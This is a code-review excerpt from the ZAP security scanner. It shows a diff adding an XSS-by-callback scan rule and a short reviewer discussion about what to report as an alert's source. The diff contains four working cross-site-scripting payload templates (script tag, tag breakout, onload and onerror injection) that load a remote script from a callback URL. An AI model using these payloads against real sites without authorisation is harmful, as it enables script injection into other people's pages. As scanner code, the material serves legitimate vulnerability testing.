src/org/zaproxy/zap/extension/ascanrulesAlpha/XssByCallbackScanner.java

```diff
@@ -0,0 +1,154 @@
+        return Constant.messages.getString("ascanalpha.xssbycallbackscanner.name");
+    }
+
+    @Override
+    public String getReference() {
+        if (VULN != null) {
+            StringBuilder sb = new StringBuilder();
+            for (String ref : VULN.getReferences()) {
+                if (sb.length() > 0) {
+                    sb.append('\n');
+                }
+                sb.append(ref);
+            }
+            return sb.toString();
+        }
+        return "Failed to load vulnerability reference from file";
+    }
+
+    @Override
+    public String[] getDependency() {
+        return null;
+    }
+
+    private static final String SIMPLE_SCRIPT_XSS_ATTACK = "<script src=\"{0}\"></script>";
+    private static final String END_TAG_SCRIPT_XSS_ATTACK = "</script><script src=\"{0}\">";
+    private static final String ON_LOAD_ATTRIBUTE_ATTACK = "\" onload=\"var s=document.createElement('script');s.src='{0}';document.getElementsByTagName('head')[0].appendChild(s);\" garbage=\"";
+    private static final String ON_ERROR_ATTRIBUTE_ATTACK = "'\"><img src=x onerror=\"var s=document.createElement('script');s.src='{0}';document.getElementsByTagName('head')[0].appendChild(s);\">\n";
+
+    private static final String[] XSS_ATTACK_PATTERNS = {
+            SIMPLE_SCRIPT_XSS_ATTACK,
+            END_TAG_SCRIPT_XSS_ATTACK,
+            ON_LOAD_ATTRIBUTE_ATTACK,
+            ON_ERROR_ATTRIBUTE_ATTACK
+    };
+
+    @Override
+    public void init() {
+    }
+
+    @Override
+    public void scan(HttpMessage httpMessage, String param, String value) {
+        for (String attackStringPattern : XSS_ATTACK_PATTERNS) {
+            String challenge = callbackApi.generateRandomChallenge();
+            String callbackUrl = callbackApi.getCallbackUrl(challenge);
+            String attackString = MessageFormat.format(attackStringPattern, callbackUrl);
+            HttpMessage newMsg = getNewMsg();
+            setParameter(newMsg, param, attackString);
+            XssCallbackContext context = new XssCallbackContext(attackString, param);
+            callbackApi.registerCallback(challenge, this, httpMessage, context);
+
+            try {
+                sendAndReceive(newMsg);
+            } catch (IOException e) {
+                LOG.warn(e.getMessage(), e);
+            }
+        }
+    }
+
+    /**
+     * Notification for a successful plugin execution
+     *
+     * @param challenge the challenge callback that has been used
+     * @param targetMessage the original message sent to the target containing the callback
+     */
+    @Override
+    public void notifyCallback(String challenge, HttpMessage targetMessage, HttpMessage callbackMsg, Object context) {
+        if (challenge == null) return;
+
+        String evidence = callbackApi.getCallbackUrl(challenge);
+        XssCallbackContext xssCallbackContext = (XssCallbackContext)context;
+        String referer = callbackMsg.getRequestHeader().getHeader("Referer");
```

Comment:
I was thinking about this over night. Having the referer is nice, however, that doesn't really give you the source of the issue. Wouldn't the actual source be `targetMessage`? You could include referer in `otherinfo`

Reply:
The uri parameter is described with "the affected URI" 
I thought "affected" is where the XSS comes up. And the targetMessage is already tracked with the last parameter of bingo()?

>Wouldn't the actual source be targetMessage?

Yes the source is targetMessage, but the `TestPersistentXSSAttack` Scanner writes the source into the "otherInfo" parameter with  "The Source URL: {0}"

But I can change it, no problem.

Reply:
Whichever, as long as both are available in the alert

Reply:
I changed it. The referer is now set to the otherinfo parameter. I added an additional information in front of the referer.

Reply:
Thanks!